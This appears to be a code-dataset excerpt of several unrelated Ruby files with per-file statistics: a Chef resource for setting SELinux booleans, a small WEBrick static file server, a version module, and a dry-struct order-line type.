ActsAsTaggableOn.strict_case_match = false
| 27.666667 | 42 | 0.879518 |
919c1d274a975d24094d61d654ba77e5bd8eef01 | 2,894 | #
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
require_relative "../resource"
require_relative "selinux/common_helpers"
class Chef
class Resource
class SelinuxBoolean < Chef::Resource
unified_mode true
provides :selinux_boolean
description "Use **selinux_boolean** resource to set SELinux boolean values."
introduced "18.0"
examples <<~DOC
**Set ssh_keysign to true**:
```ruby
selinux_boolean 'ssh_keysign' do
value true
end
```
**Set ssh_sysadm_login to 'on'**:
```ruby
selinux_boolean 'ssh_sysadm_login' do
value 'on'
end
```
DOC
property :boolean, String,
name_property: true,
description: "SELinux boolean to set."
property :value, [Integer, String, true, false],
required: true,
equal_to: %w{on off},
coerce: proc { |p| selinux_bool(p) },
description: "SELinux boolean value."
property :persistent, [true, false],
default: true,
desired_state: false,
description: "Set to true for value setting to survive reboot."
load_current_value do |new_resource|
value shell_out!("getsebool", new_resource.boolean).stdout.split("-->").map(&:strip).last
end
action_class do
include Chef::SELinux::CommonHelpers
end
action :set , description: "Set the state of the boolean." do
if selinux_disabled?
Chef::Log.warn("Unable to set SELinux boolean #{new_resource.name} as SELinux is disabled")
return
end
converge_if_changed do
cmd = "setsebool"
cmd += " -P" if new_resource.persistent
cmd += " #{new_resource.boolean} #{new_resource.value}"
shell_out!(cmd)
end
end
private
#
# Validate and return input boolean value in required format
# @param bool [String, Integer, Boolean] Input boolean value in allowed formats
#
# @return [String] [description] Boolean value in required format
def selinux_bool(bool)
if ["on", "true", "1", true, 1].include?(bool)
"on"
elsif ["off", "false", "0", false, 0].include?(bool)
"off"
else
raise ArgumentError, "selinux_bool: Invalid selinux boolean value #{bool}"
end
end
end
end
end
| 28.372549 | 101 | 0.628542 |
79c0c501c1a9dfb819095247fd1cbbbabe6e8ac9 | 74 | module DefineRails
module SensitiveData
VERSION = "1.0.1"
end
end
| 12.333333 | 22 | 0.702703 |
e243bc68fdc91582484d4f9d590f2243cef26e14 | 287 | require 'webrick'
include WEBrick
s = HTTPServer.new(
:Port => 2010,
:DocumentRoot => Dir::pwd
)
s.mount('/sh/scripts', WEBrick::HTTPServlet::FileHandler, '../scripts')
s.mount('/sh/styles', WEBrick::HTTPServlet::FileHandler, '../styles')
trap('INT') { s.stop }
s.start
| 23.916667 | 72 | 0.648084 |
181d43d1d41b11071bf093915ada4a037e997c12 | 270 | module WidgetsInc
module Types
class ValidatedOrderLine < ::Dry::Struct
attribute :order_line_id, Types.Instance(Types::OrderLineId)
attribute :product_code, Types::ProductCode.type
attribute :quantity, Types::OrderQuantity.type
end
end
end | 30 | 66 | 0.737037 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.